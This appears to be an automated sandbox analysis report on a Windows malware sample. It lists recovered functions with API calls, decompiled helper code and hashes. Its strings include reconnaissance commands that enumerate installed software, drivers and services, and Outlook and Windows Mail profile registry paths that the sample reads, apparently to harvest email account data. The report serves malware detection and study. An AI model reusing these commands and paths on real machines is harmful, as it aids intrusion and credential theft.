Instruction Fuzzy Hash: A7016D39304219AB9B10EE22DC88DFF3B2EFB85650720142FFC0193280DA70D8129B70

Uniqueness

Uniqueness Score: -1.00%

Function 0541C916, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,7748D3B0,00000000,00000000,05412969,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC), ref: 0541C91D
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 0541C935
memcpy.NTDLL(0000000C,?,00000001,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 0541C94B

Part of subcall function 054031B8: StrChrA.SHLWAPI(00000000,0540672C,7748D3B0,05958D54,00000000,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 054031DE
Part of subcall function 054031B8: StrTrimA.SHLWAPI(00000000,0542A4A4,00000000,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 054031FD
Part of subcall function 054031B8: StrChrA.SHLWAPI(00000000,0540672C,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 0540320E
Part of subcall function 054031B8: StrTrimA.SHLWAPI(00000001,0542A4A4,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 05403220

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 0541C97D

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: fa2f25fa6af16140604ec164da1a0435732a0eec6c976bbf524d32a43e3c16ce
Instruction ID: c73fe2a3e1a1e93f3fde048316d5034806fc7edcdf6d8ecbf408704b9d57fafd
Opcode Fuzzy Hash: fa2f25fa6af16140604ec164da1a0435732a0eec6c976bbf524d32a43e3c16ce
Instruction Fuzzy Hash: D801FC716A4755ABE3315A21DC89FEBBF69FB80751F01403AF90696180CB608C068B69

Uniqueness

Uniqueness Score: -1.00%

Function 0540F844, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0542E288), ref: 0540F84F
Sleep.KERNEL32(0000000A,?,?,?,0540AD98,00000000,?,00000029,0542E098,05402A93,?), ref: 0540F859
SetEvent.KERNEL32(?,?,?,0540AD98,00000000,?,00000029,0542E098,05402A93,?), ref: 0540F8B0
RtlLeaveCriticalSection.NTDLL(0542E288), ref: 0540F8CF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 01cdd44f1eeda8d44a4af6ee80916c353fb92418cc13443c6645d73faf25fdec
Instruction ID: 6ae0a91ab2c7248170a5700005ec218355790bf58112253eb8e4f1293b7ae52a
Opcode Fuzzy Hash: 01cdd44f1eeda8d44a4af6ee80916c353fb92418cc13443c6645d73faf25fdec
Instruction Fuzzy Hash: 91014071A60324BBE724AB619C4AFEA3FADEB04701F904076FB05D6181DB705545CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0541A490, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 05410908: lstrlen.KERNEL32(00000000,00000000,00000000,05419360,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 0541090D
Part of subcall function 05410908: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05410922
Part of subcall function 05410908: wsprintfA.USER32 ref: 05410937
Part of subcall function 05410908: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05410953

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0541A4BE
GetFileSize.KERNEL32(00000000,00000000), ref: 0541A4CD
CloseHandle.KERNEL32(00000000), ref: 0541A4D7
GetLastError.KERNEL32 ref: 0541A4DF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 3200daa1dd9fe11dbc9dd19f30e1de53e5eec6cfdd6c572440dcda9179e43573
Instruction ID: dabde5147fe6d0bd6d89a6cc1bae5209c06c239e761c47d687ea3145f72b6bad
Opcode Fuzzy Hash: 3200daa1dd9fe11dbc9dd19f30e1de53e5eec6cfdd6c572440dcda9179e43573
Instruction Fuzzy Hash: 57F0D131206224BBD7342B6BDC8EFDF7E6CEB01B60F50811BFA0A91180DA34954082E9

Uniqueness

Uniqueness Score: -1.00%

Function 054237D8, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

RtlInitializeCriticalSection.NTDLL(0542E260), ref: 054237FC
RtlInitializeCriticalSection.NTDLL(0542E240), ref: 05423812
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 05423823
GetModuleHandleA.KERNEL32(0542F01D,?,?,?,?,?,?,?,?,0540202D,?), ref: 05423850

Part of subcall function 0541CEB3: GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77A19EB0,00000000,?,?,?,?,00000000,0542383A), ref: 0541CEC4
Part of subcall function 0541CEB3: LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 0541CF5E
Part of subcall function 0541CEB3: FreeLibrary.KERNEL32(00000000), ref: 0541CF69

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 414113da1dfc5a9e5328802eb95b64ab9e573917c402e1f657df13bbe8a67d37
Instruction ID: 43b27392217f1945ea63a4b1b3edcf605f930897dbc15f8190d9c9b711036801
Opcode Fuzzy Hash: 414113da1dfc5a9e5328802eb95b64ab9e573917c402e1f657df13bbe8a67d37
Instruction Fuzzy Hash: AE018E719203349FD32C8F66A886AF67FE9A7843107C0083BE506CA300DFB404619FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02774200, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02774200(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E02775B70(_t8, _t1);
				_t16 = E027775C4(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E027739B5(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E027775C4(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E02774C31(_t16);
				}
				return _t18;
			}

0x0277420b
0x0277420c
0x0277420f
0x02774211
0x0277421c
0x02774220
0x02774225
0x02774229
0x02774231
0x02774236
0x0277423e
0x0277423e
0x02774247
0x0277424b
0x02774251
0x02774254
0x0277425a
0x0277425a
0x02774262
0x02774262
0x02774269
0x02774269
0x02774274

APIs

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

Part of subcall function 027739B5: wsprintfA.USER32 ref: 02773A11

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,74ECC740,027770CE,74666F53,00000000,?,00000000,?,?,027779D7), ref: 02774236
lstrcpy.KERNEL32(00000000,00000000), ref: 0277425A
lstrcat.KERNEL32(00000000,00000000), ref: 02774262

Strings

Soft, xrefs: 0277420C, 02774225

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: ad52e8715da7b450115160111ffd8ffaebd03fec12646f5a66d6e2fa8db6bf02
Instruction ID: cfbe537cfb3d871eac8aa1008bc88e240dfea0825954d3bdaf0aabb2e8508d67
Opcode Fuzzy Hash: ad52e8715da7b450115160111ffd8ffaebd03fec12646f5a66d6e2fa8db6bf02
Instruction Fuzzy Hash: DA01A23220021AB7CF136B689C88EAF7B7AAF85349F044425F90555100DB74C959CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0541088F, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 054108A1

Part of subcall function 0540976C: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,0540E69C), ref: 054097AD
Part of subcall function 0540976C: GetLastError.KERNEL32 ref: 054097B7
Part of subcall function 0540976C: WaitForSingleObject.KERNEL32(000000C8), ref: 054097DC
Part of subcall function 0540976C: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 054097FD
Part of subcall function 0540976C: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 05409825
Part of subcall function 0540976C: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0540983A
Part of subcall function 0540976C: SetEndOfFile.KERNEL32(00000006), ref: 05409847
Part of subcall function 0540976C: CloseHandle.KERNEL32(00000006), ref: 0540985F

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0540B5AD,.dll,?,00001000,?,?,?), ref: 054108C4
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0540B5AD,.dll,?,00001000,?,?,?), ref: 054108E6
GetLastError.KERNEL32(?,0540B5AD,.dll,?,00001000,?,?,?), ref: 054108FA

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: c7ea23b3f4468969d778c639f6433316c0f68fbe0d094b85abf5d5d5c6c141cb
Instruction ID: 3a89530623cd74c3149b180c8cba51883b94fbf87da17dedc0357cf508d0a73e
Opcode Fuzzy Hash: c7ea23b3f4468969d778c639f6433316c0f68fbe0d094b85abf5d5d5c6c141cb
Instruction Fuzzy Hash: 99F0AF31250318BBEB295F609C0EFEE3E2ABF04310F504015FB0B991D0DF7194628B6A

Uniqueness

Uniqueness Score: -1.00%

Function 05410E68, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,05422BDD,000000FF,059587E8,?,?,05407E3E,0000012B,059587E8), ref: 05410E84
GetLastError.KERNEL32(?,?,05407E3E,0000012B,059587E8,?,?,?,05422097,00000000,00000000,00000001,75144D40), ref: 05410E8F
WaitNamedPipeA.KERNEL32(00002710), ref: 05410EB1
WaitForSingleObject.KERNEL32(00000000,?,?,05407E3E,0000012B,059587E8,?,?,?,05422097,00000000,00000000,00000001,75144D40), ref: 05410EBF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: 179a10063dee0cfb25acabca0fed6db6aa015cf67f561b430c7d225ab0e91c66
Instruction ID: 37994af220309c3f9196ebb77d3ae273e6387061c771c216d22c2394ea5f18aa
Opcode Fuzzy Hash: 179a10063dee0cfb25acabca0fed6db6aa015cf67f561b430c7d225ab0e91c66
Instruction Fuzzy Hash: 93F06232645330ABE3341666AC8EFEB7E56FB04361F514562FA49E6290CA315C90C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 05409113, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05958D20), ref: 0540911C
Sleep.KERNEL32(0000000A,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 05409126
HeapFree.KERNEL32(00000000,?,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 0540914E
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 0540916C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: e1c048a11b92896cfc2f712362ab0864abb5bca9bbbd32cdf9a4040f97dfdb62
Instruction ID: e7eafed7b878493872745e422d34d07781a2e4ec0664eb3aa302028d0952f31b
Opcode Fuzzy Hash: e1c048a11b92896cfc2f712362ab0864abb5bca9bbbd32cdf9a4040f97dfdb62
Instruction Fuzzy Hash: EEF030703103619BEB389B25DC4EFEA3F69AB05644F95C466B601DB2D2CA70D854C719

Uniqueness

Uniqueness Score: -1.00%

Function 02775B10, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02775B10(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x277d2dc; // 0x4f39630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x277d2dc; // 0x4f39630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x277d030) {
					HeapFree( *0x277d1f0, 0, _t8);
				}
				_t14[1] = E0277752B(_v0, _t14);
				_t11 =  *0x277d2dc; // 0x4f39630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x02775b10
0x02775b10
0x02775b19
0x02775b29
0x02775b29
0x02775b2e
0x02775b33
0x00000000
0x00000000
0x02775b23
0x02775b23
0x02775b35
0x02775b39
0x02775b4b
0x02775b4b
0x02775b5b
0x02775b5e
0x02775b63
0x02775b67
0x02775b6d

APIs

RtlEnterCriticalSection.NTDLL(04F395F0), ref: 02775B19
Sleep.KERNEL32(0000000A,?,?,027779CC,?,?,?,?,?,027787DD,?,00000001), ref: 02775B23
HeapFree.KERNEL32(00000000,00000000,?,?,027779CC,?,?,?,?,?,027787DD,?,00000001), ref: 02775B4B
RtlLeaveCriticalSection.NTDLL(04F395F0), ref: 02775B67

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 2294c717900604683a6dc54f5c47c8ce0c88ae697cfa6e4ca23e38eafe20f962
Instruction ID: ec92d3f6c8a624621888ac766bbdcd8d926ddbc1d716b40523fbed57713b03a8
Opcode Fuzzy Hash: 2294c717900604683a6dc54f5c47c8ce0c88ae697cfa6e4ca23e38eafe20f962
Instruction Fuzzy Hash: 66F082B1A412809FDB259F68DC49F2677A4BF18344F00CC09F945D7260C730D829DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0277310C, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0277310C() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x277d224; // 0x2d8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x277d264; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x277d224; // 0x2d8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x277d1f0; // 0x4b40000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x0277310c
0x02773113
0x0277315d
0x0277315f
0x0277315f
0x02773117
0x0277311d
0x02773122
0x02773126
0x0277312c
0x02773133
0x00000000
0x00000000
0x02773135
0x0277313a
0x00000000
0x00000000
0x00000000
0x0277313a
0x0277313c
0x02773144
0x02773147
0x02773147
0x0277314d
0x02773154
0x02773157
0x02773157
0x00000000

APIs

SetEvent.KERNEL32(000002D8,00000001,0277A615), ref: 02773117
SleepEx.KERNEL32(00000064,00000001), ref: 02773126
CloseHandle.KERNEL32(000002D8), ref: 02773147
HeapDestroy.KERNEL32(04B40000), ref: 02773157

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 0a6e182e5040eb802e848fee93f2b15fc71e2f1e96675e59b1eb0f399ac9e070
Instruction ID: 47a0759db18ee3afc691faba482c68b067582a7ad9b5107dd8e7a609d1f76b54
Opcode Fuzzy Hash: 0a6e182e5040eb802e848fee93f2b15fc71e2f1e96675e59b1eb0f399ac9e070
Instruction Fuzzy Hash: C2F06531F857119BEF315B78AD08F07379CAF19B95B058D55BD14D7280EB30D419D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 027710E4, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E027710E4() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x277d2dc; // 0x4f39630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x277d2dc; // 0x4f39630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x277d2dc; // 0x4f39630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x277e882) {
					HeapFree( *0x277d1f0, 0, _t10);
					_t7 =  *0x277d2dc; // 0x4f39630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x027710e4
0x027710ed
0x027710fd
0x027710fd
0x02771102
0x02771107
0x00000000
0x00000000
0x027710f7
0x027710f7
0x02771109
0x0277110e
0x02771112
0x02771125
0x0277112b
0x0277112b
0x02771134
0x02771136
0x0277113a
0x02771140

APIs

RtlEnterCriticalSection.NTDLL(04F395F0), ref: 027710ED
Sleep.KERNEL32(0000000A,?,?,027779CC,?,?,?,?,?,027787DD,?,00000001), ref: 027710F7
HeapFree.KERNEL32(00000000,?,?,?,027779CC,?,?,?,?,?,027787DD,?,00000001), ref: 02771125
RtlLeaveCriticalSection.NTDLL(04F395F0), ref: 0277113A

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: e47041ee0d2552b8759243b6f50a0b93138d9e1561f8ee1eaf864bacb9ead630
Instruction ID: ce83ad425514db8efe5ca43e2683e36c60dbadefeab0a3c42d40345b4d2f72e1
Opcode Fuzzy Hash: e47041ee0d2552b8759243b6f50a0b93138d9e1561f8ee1eaf864bacb9ead630
Instruction Fuzzy Hash: CEF0FE75A92241DFEB298F25D899F267764BF18344F04C859F90697360CB30E825DB54

Uniqueness

Uniqueness Score: -1.00%

Function 054041B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0540E6A7,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 054041D1
wsprintfA.USER32 ref: 054041EF

Strings

%02u:%02u:%02u , xrefs: 054041E9

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: 2bff512621de5ceb588cf3fe94727ab0c2cbeda98fdc71e9ca85f0bea1a14c61
Instruction ID: 0e1dfc9c95e7f0a7fe9a2f7370ef82631ce7440f2f3f865413520e4bd0498876
Opcode Fuzzy Hash: 2bff512621de5ceb588cf3fe94727ab0c2cbeda98fdc71e9ca85f0bea1a14c61
Instruction Fuzzy Hash: D9213DB5A10224AFCB24DF95DC4AEFB7B7CFB88741B904869F901DB241DA74A811CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05423BA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 05423BEC
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 05423BFE

Strings

0x, xrefs: 05423BE6

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: dcb7dedf9a7a39b0525e1e254e3fb0af54e905067ed1d5bdbd7529f355abc6c5
Instruction ID: 9b5486ca9e41199e151bb6c397808b2d797bc4c5c8cb0638e6a61122f0cd7db6
Opcode Fuzzy Hash: dcb7dedf9a7a39b0525e1e254e3fb0af54e905067ed1d5bdbd7529f355abc6c5
Instruction Fuzzy Hash: 6C01B136A00229BBDF11DEA9C805AEFBBB8FF44244F504455E909E7240EBB0DA09CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 05406512, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON

Download Yara Rule

APIs

Part of subcall function 05407DEB: RegCreateKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E00
Part of subcall function 05407DEB: lstrlen.KERNEL32(059587E8,00000000,00000000,00000000,?,?,?,05422097,00000000,00000000,00000001,75144D40,?,?,?,05412103), ref: 05407E2E

RegSetValueExA.ADVAPI32(?,Client,00000000,00000003,?,00000028,00000001,?), ref: 0540653F
RegCloseKey.ADVAPI32(?), ref: 0540654A

Strings

Client, xrefs: 05406537

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID: Client
API String ID: 1356686001-3236430179
Opcode ID: 8b93e1e341b87c71dd61a22aa4d55c3c41f6995abd6dfb05421cd41ae6d808fb
Instruction ID: a3171c92a336d20814bb8bbfbb7dd043270e1c4750eda43da20f4057a11b7305
Opcode Fuzzy Hash: 8b93e1e341b87c71dd61a22aa4d55c3c41f6995abd6dfb05421cd41ae6d808fb
Instruction Fuzzy Hash: AEE06576A40124BBDB215695DC1AEEABF6DDB14750F500062FA01E7190D6B19E1197D0

Uniqueness

Uniqueness Score: -1.00%

Function 05422579, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\,00000000,00020019,?,00000008,?,?,05419C75,?,?,Software\Microsoft\Windows Live Mail,?,Software\Microsoft\Windows Mail), ref: 05422593
RegCloseKey.ADVAPI32(?,?,00000001,?,?,05419C75,?,?,Software\Microsoft\Windows Live Mail,?,Software\Microsoft\Windows Mail), ref: 054225AF

Strings

Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\, xrefs: 05422589

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
API String ID: 47109696-3083934730
Opcode ID: 1941f64e5bce8bca05b8c09a628c176d93f94eedd007bdd866cdb3221f7b41e7
Instruction ID: 591a09fd5c0e06b6facc04c9a4b1e80fda1b0fbf69ce85628bdb4ce1755b7572
Opcode Fuzzy Hash: 1941f64e5bce8bca05b8c09a628c176d93f94eedd007bdd866cdb3221f7b41e7
Instruction Fuzzy Hash: 55E04F7AE00238FBDB2556A1DC1AFDDBA69EB08790F200165FE01F6250E6B19E10A6D4

Uniqueness

Uniqueness Score: -1.00%

Function 05403B0D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\,00000000,00020019,?), ref: 05403B27
RegCloseKey.ADVAPI32(?,?,?), ref: 05403B43

Strings

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\, xrefs: 05403B1D

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
API String ID: 47109696-316241766
Opcode ID: 379fccf392d7a468d757045c36dde5a429c730cc8395c34cc5a4fe1f03969fe9
Instruction ID: 0adc00adb2c71410a404eacdd1247ab252a207a0800982a2cb8b093ae224f3a0
Opcode Fuzzy Hash: 379fccf392d7a468d757045c36dde5a429c730cc8395c34cc5a4fe1f03969fe9
Instruction Fuzzy Hash: 14E04F7AE40328BBDB215A919C0EEDEBE68EB09751F200161FE05F6251D6719E10A6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0541924E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\,00000000,00020019,?), ref: 05419268
RegCloseKey.ADVAPI32(?,?,?), ref: 05419284

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\, xrefs: 0541925E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
API String ID: 47109696-1895784063
Opcode ID: 8885c994784e1c56215639ab9f0ae949825918c54e9e41b482c3812c3b747eb1
Instruction ID: f717c3841dc82bc5627a139506813f7fe34019e5201ff56fffe7e10f2bc3ee99
Opcode Fuzzy Hash: 8885c994784e1c56215639ab9f0ae949825918c54e9e41b482c3812c3b747eb1
Instruction Fuzzy Hash: 2CE0DF76E40228FBDB2556909C0AEDDBA68EB08741F200161FE01F6250DA718E00A6D0

Uniqueness

Uniqueness Score: -1.00%

Function 05425868, Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

APIs

memcpy.NTDLL(-00000040,054100E4,00000800,00000000,00000000,00000000,00000000), ref: 05425AAA

Part of subcall function 054076A8: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,05425769,?,?,?,?,05425978,?,?,00000000,00000000,00000000), ref: 054076CD
Part of subcall function 054076A8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 054076EF
Part of subcall function 054076A8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 05407705
Part of subcall function 054076A8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0540771B
Part of subcall function 054076A8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 05407731
Part of subcall function 054076A8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 05407747

